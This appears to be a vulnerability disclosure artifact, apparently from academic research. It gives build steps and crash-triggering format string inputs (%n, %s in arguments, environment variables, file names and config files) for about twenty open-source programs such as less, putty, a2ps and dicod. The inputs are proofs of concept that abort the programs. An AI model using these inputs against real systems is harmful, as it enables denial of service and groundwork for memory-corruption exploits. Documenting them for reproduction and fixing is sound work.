Program inputs that trigger the format string bugs we found

Our test environment is 64bit Ubuntu 16.04

List of packages we installed

  1. rplay-3.3.2/rptp
    $ sudo apt-get install rplay-server
    $ sudo service rplay start
    $ sudo apt-get remove libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rplay_3.3.2.orig.tar.gz
    $ tar xvzf rplay_3.3.2.orig.tar.gz
    $ cd rplay-3.3.2
    $ sed -i "s/static int inetd/int inetd/g" rplayd/rplayd.c
    $ sed -i "s/<sys\/types.h>/<sys\/types.h>\n#include <errno.h>/g" rplayd/rplayd.h
    $ ./configure && make CFLAGS=-D_GNU_SOURCE && sudo make install

    1.1
    $ rptp volume %n
    Aborted (core dump)

    1.2
    $ rptp
    rptp> volume %n
    Aborted (core dump)

    1.3
    // without readline library
    $ rptp --prompt %n
    Aborted (core dump)

  2. rplay-3.3.2/rptp
    $ sudo apt-get install rplay-server
    $ sudo service rplay start
    $ sudo apt-get remove libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rplay_3.3.2.orig.tar.gz
    $ tar xvzf rplay_3.3.2.orig.tar.gz
    $ cd rplay-3.3.2
    $ sed -i "s/static int inetd/int inetd/g" rplayd/rplayd.c
    $ sed -i "s/<sys\/types.h>/<sys\/types.h>\n#include <errno.h>/g" rplayd/rplayd.h
    $ ./configure && make CFLAGS=-D_GNU_SOURCE && sudo make install

    2.1
    $ sudo apt-get install rplay-server
    $ rplay %n
    Aborted (core dump)

  3. a2ps-4.14

    $ sudo apt-get install gperf
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/a/a2ps/a2ps_4.14.orig.tar.gz
    $ tar xvzf a2ps_4.14.orig.tar.gz
    $ cd a2ps-4.14 && ./configure && make && sudo make install

    3.1
    $ cat /usr/local/share/a2ps/ps/exploit.pro

    % -- code follows this line --  
    %Expand: exploit\%n\%n\%n  
    %Face: Plain Courier bfs  
    %Face: Symbol Symbol bfs  
    %Face: Keyword Courier-Oblique bfs  
    %Face: Keyword_strong Courier-Bold bfs  
    %Face: Comment Courier-Oblique bfs  
    %Face: Comment_strong Courier-BoldOblique bfs  
    %Face: Label Helvetica bfs  
    %Face: Label_strong Helvetica-Bold bfs  
    %Face: String Times-Roman bfs  
    %Face: Error Helvetica-Bold bfs  
    

    $ a2ps --prologue=exploit
    Aborted (core dump)

    3.2
    $ cat /usr/local/share/a2ps/ps/exploit2.pro

    % -- code follows this line --  
    %%Expand: $(BUG)  
    %Face: Plain Courier bfs  
    %Face: Symbol Symbol bfs  
    %Face: Keyword Courier-Oblique bfs  
    %Face: Keyword_strong Courier-Bold bfs  
    %Face: Comment Courier-Oblique bfs  
    %Face: Comment_strong Courier-BoldOblique bfs  
    %Face: Label Helvetica bfs  
    %Face: Label_strong Helvetica-Bold bfs  
    %Face: String Times-Roman bfs  
    %Face: Error Helvetica-Bold bfs  
    

    $ export BUG=exploit%n%n%n
    $ a2ps --prologue=exploit
    Aborted (core dump)

  4. mp3rename-0.6

    4.1
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/mp3rename_0.6.orig.tar.gz
    $ tar xvzf mp3rename_0.6.orig.tar.gz
    $ cd mp3rename-0.6.orig/ && make
    $ ./mp3rename -s exploit%n%n%n%n
    Aborted (core dump)

  5. fpgatools-0.0+201212-1/sort_seq

    5.1
    $ sudo apt-get install libxml2-dev
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/f/fpgatools/fpgatools_0.0+201212.orig.tar.gz
    $ tar xvzf fpgatools_0.0+201212.orig.tar.gz
    $ cd fpgatools-201212 && make
    $ echo exploit%n%n%n > t
    $ ./sort_seq t
    Aborted (core dump)

  6. devio-1.2
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/devio_1.2.orig.tar.gz
    $ tar xvzf devio_1.2.orig.tar.gz
    $ cd devio-1.2/ && ./configure && make && sudo make install
    6.1
    $ devio pfexploit%n%n%n
    Aborted (core dump)

  7. uni2ascii-4.14
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/uni2ascii_4.14.orig.tar.gz
    $ tar xvzf uni2ascii_4.14.orig.tar.gz
    $ cd uni2ascii-4.14
    $ sed -i 's/endian.h/myendian.h/g' *
    $ mv endian.h myendian.h
    $ ./configure && $ make CFLAGS=-D_GNU_SOURCE && sudo make install
    7.1
    $ uni2ascii -n -Z exploit%n
    -- press enter --
    Aborted (core dump)

  8. shntool-3.0.10
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/shntool_3.0.10.orig.tar.gz
    $ tar xvzf shntool_3.0.10.orig.tar.gz
    $ cd shntool-3.0.10/ && ./configure && make && sudo make install
    8.1
    $ shntool split -n "%n" -f [CUE file] [WAV file]
    Aborted (core dump)

  9. less-481
    $less --version
    less 481 (GNU regular expressions)

    9.1
    $ python -c 'print "\xAA" ' > exploit
    $ export LESSBINFMT=%s%s%s
    $ less exploit
    Aborted (core dump)
    9.2
    $ python -c 'print "\xEF\xBB\xBF\xD0\x81"' > exploit
    $ export LESSUTFBINFMT=%s%s%s
    $ less exploit
    Aborted (core dump)

  10. tiptop-2.2

    10.1
    $ sudo apt-get install libxml2-dev
    $ sudo apt-get install byacc flex
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/tiptop_2.2.orig.tar.gz
    $ ./configure && make && sudo make install $ cd ~/ $ cat .tiptoprc

    <tiptop>
    <screen name="exploit" desc="Screen by default ">
    <column header="  Exploit!" format=" exploit%n%n%n" desc="CPU usage" expr="CPU_TOT" />
    </screen>
    </tiptop>
    

    $ tiptop -W . -i -- push rightarrow twice -- Aborted (core dump)

  11. ghostscript-8.71/genconf

    11.1
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/ghostscript_8.71.dfsg.2.orig.tar.gz
    $ tar xvzf ghostscript_8.71.dfsg.2.orig.tar.gz
    $ cd ghostscript-8.71.dfsg.2 && ./configure && make XCFLAGS=-DHAVE_SYS_TIME_H=1
    $ cd obj
    $ cat pgmraw.dev
    -dev2 pgmraw -include ./obj/page -obj ./obj/gdevpbm.o ./obj/gdevppla.o ./obj/gdevmpla.o
    $ ./genconf -n exploit%n%n%n pgmraw.dev

  12. pal-0.4.3
    $ sudo apt-get install libglib2.0-dev
    $ sudo apt-get install libncurses5-dev
    $ sudo apt-get install libreadline-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/pal_0.4.3.orig.tar.gz
    $ tar xvzf pal_0.4.3.orig.tar.gz
    $ cd pal-0.4.3/ && make && sudo make install

    12.1
    $ touch exploit%n%n%n
    $ pal -p exploit%n%n%n
    Aborted (core dump)

    12.2
    $ pwd
    $ /home/icse
    $ touch exploit%n%n%n
    $ pal -p /home/icse/exploit%n%n%n
    Aborted (core dump)

    12.3
    $ pwd
    $ /home/icse
    $ touch exploit%n%n%n
    $ cat exploit.pal
    file_hide /home/icse/exploit%n%n%n
    $ pal -f exploit.pal
    Aborted (core dump)

  13. latex2rtf-2.3.8
    $ sudo apt-get install texinfo
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/latex2rtf_2.3.8.orig.tar.gz
    $ tar xvzf latex2rtf_2.3.8.orig.tar.gz
    $ cd latex2rtf-2.3.8/ && make && sudo make install
    13.1
    $ cat exploit.tex

    \documentclass{article}  
    \begin{document}  
    \title{exploit}  
    \author{Jong-Gwon Kim}  
    \keywords{exploit\%n\%n\%n}  
    \end{document}  
    

    $ latex2rtf exploit.tex
    Aborted (core dump)

  14. putty-0.65
    $ sudo apt-get install libgtk2.0-dev
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/putty_0.65.orig.tar.gz
    $ tar xvzf putty_0.65.orig.tar.gz
    $ cd putty-0.65 && ./configure && make && sudo make install
    14.1
    $ cd /tmp
    $ mkdir exploit%n%n%n
    $ mkdir exploit%n%n%n/.putty
    $ chmod 000 exploit%n%n%n/.putty
    $ export HOME=/tmp/exploit%n%n%n
    $ putty
    -- connect to some host via ssh --
    Aborted (core dump)

  15. daemon-0.6.4
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/daemon_0.6.4.orig.tar.gz
    $ tar xvzf daemon_0.6.4.orig.tar.gz
    $ cd daemon-0.6.4/ && ./configure && make && sudo make install
    15.1 argv
    $ ln -s /usr/local/bin/daemon exploit%n%n%n
    $ ./exploit%n%n%n test -r -L 999999999999999
    Aborted (core dump)

  16. dico-2.0
    $ sudo apt-get install byacc flex
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/dico_2.0.orig.tar.gz
    $ tar xvzf dico_2.0.orig.tar.gz
    $ cd dico-2.0 && ./configure && make && sudo make install
    16.1
    $ cd ~; mkdir exploit%n%n%n
    $ export HOME=~/exploit%n%n%n
    $ echo "a" > $HOME/.dico
    $ LD_LIBRARY_PATH=/usr/local/lib dico
    Aborted (core dump)

  17. dicod-2.0
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/dico_2.0.orig.tar.gz
    $ tar xvzf dico_2.0.orig.tar.gz
    $ cd dico-2.0 && ./configure && make && sudo make install
    17.1
    $ cat exploitfile%n%n%n
    abcdef
    $ LD_LIBRARY_PATH=/usr/local/lib dicod --config exploitfile%n%n%n
    Aborted (core dump)

    17.2 //different sink
    $ export DICTD_LOGGING=LOG
    $ cat exploitfile%n%n%n
    abcdef
    $ LD_LIBRARY_PATH=/usr/local/lib dicod --config exploitfile%n%n%n
    Aborted (core dump)

  18. rrdtool-1.4.8
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/rrdtool_1.4.8.orig.tar.gz
    $ tar xvzf rrdtool_1.4.8.orig.tar.gz
    $ cd rrdtool-1.4.8 && LDFLAGS="-lglib-2.0" ./configure && make && sudo make install
    18.1
    $ /opt/rrdtool-1.4.8/bin/rrdtool graphv foo.svg -f exploit%n%n%n
    Aborted (core dump)

  19. gnuplot-4.2.6
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/gnuplot_4.2.6.orig.tar.gz
    $ tar xvzf gnuplot_4.2.6.orig.tar.gz
    $ cd gnuplot-4.2.6/ && ./configure && make && sudo make install

    19.1
    $ export GNUPLOT_TTFTOPFA=exploit%n%n%n
    $ touch my.ttf
    $ gnuplot
    gnuplot> set term postscript fontfile "my.ttf"

  20. sdop-0.61
    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/sdop_0.61.orig.tar.gz
    $ tar xvzf sdop_0.61.orig.tar.gz
    $ cd sdop-0.61
    $ sed -i 's/sdop \$(SDOBJ)/sdop \$(SDOBJ) \$(LIBS)/g' src/Makefile
    $ ./configure && make && sudo make install

    20.1
    $ cat sink1

    <?sdop orderedlist_format="%n%n%n" ?>  
    <orderedlist>  
    <listitem>  
    <para>Exploit</para>  
    </listitem>  
    </orderedlist>  
    

    $ sdop sink1
    Aborted (core dump)

    20.2 // different src
    $ cat sink1

    <?sdop   
    orderedlist_format="%n%n%n" ?>  
    <orderedlist>  
    <listitem>  
    <para>Exploit</para>  
    </listitem>  
    </orderedlist>  
    

    $ sdop sink1
    Aborted (core dump)

    20.3
    $ cat sink2

    <?sdop example_number_format="[%n]" ?>  
    <example id="exploit">  
    <title>Exploit</title>  
    </example>  
    

    $ sdop sink2
    Aborted (core dump)

    20.4 // different src
    $ cat sink2

    <?sdop   
    example_number_format="[%n]" ?>  
    <example id="exploit">  
    <title>Exploit</title>  
    </example>  
    

    $ sdop sink2
    Aborted (core dump)